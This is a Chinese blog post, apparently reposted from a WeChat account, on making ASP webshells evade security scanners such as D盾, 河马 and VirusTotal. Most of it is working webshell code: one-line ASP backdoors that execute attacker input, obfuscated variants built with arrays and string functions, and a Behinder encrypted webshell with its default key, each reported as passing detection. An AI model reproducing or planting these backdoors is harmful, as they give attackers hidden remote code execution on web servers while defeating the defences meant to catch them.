前言:答应师傅们的asp webshell免杀
他来了他来了
下一篇可能会写exe免杀这些东西 不过可能间隙时间这些可能会有点长,最近考试周啥的 事情比较多
正文:
asp免杀的手法其实也蛮多的
个人理解其实免杀核心就是混淆+改变执行顺序啥的。
对于asp而言,前者的利用特征::这些进行绕 后者就是利用函数数组+类的手法 个人后者的手法用的最多
一样吧
这里先扔2个bypass的小马
小马
bypass小马1
内容
密码404
<%
dim a(5)
a(0) = request("404")
b = LTrim(a(0))
response.write b
eXecUTe(b)
%>
bypass过程分析:
最基础的一句话
<%
eXecUTe(request("404"))
%>
看看效果
没啥好说的 必然是被查的死死的
加点东西进去在看看
拆分后降级为四级
在引入数组
<%
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>
就已经bypass d盾了 百度 长亭了 但是河马和vt没全过 那就想办法在处理下呗
百度的
长亭的
vt
河马
在加了干扰函数LTrim()进去即上面完全bypass的 即成功的bypass了
<%
dim a(5)
a(0) = request("404")
b = LTrim(a(0))
response.write b
eXecUTe(b)
%>
河马
vt
bypass小马2
只用函数的思路去bypass
拿雨苁大佬里面的函数马拿来做bypass吧
<%
Function b():
b = request("404")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
效果目前还行:还没被完全标记 标识目前为1级
加个left函数进去处理看看
<%
Function b()
b = request("404")
End Function
Function f():
x=b()
y=Left(x,99999)
execute(y)
End Function
f()
%>
就bypass过去了
d盾
河马
百度
长亭
vt
冰蝎马
有一说一asp的我不是特别喜欢用冰蝎的 有些环境奇怪的很 连不上
不过还是写出来
基础的冰蝎
<%
Response.CharSet = "UTF-8"
k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>
毋庸置疑 直接五级
利用bypass思路
拆分法
<%
Response.CharSet = "UTF-8"
k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
x=ascb(midb(content,i,1))
y=Asc(Mid(k,(i and 15)+1,1))
z=z&Chr( x Xor y)
Next
execute(z)
%>
d盾
长亭
vt
百度
vt
原文始发于微信公众号(goddemon的小屋):过d盾asp webshell+冰蝎免杀马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论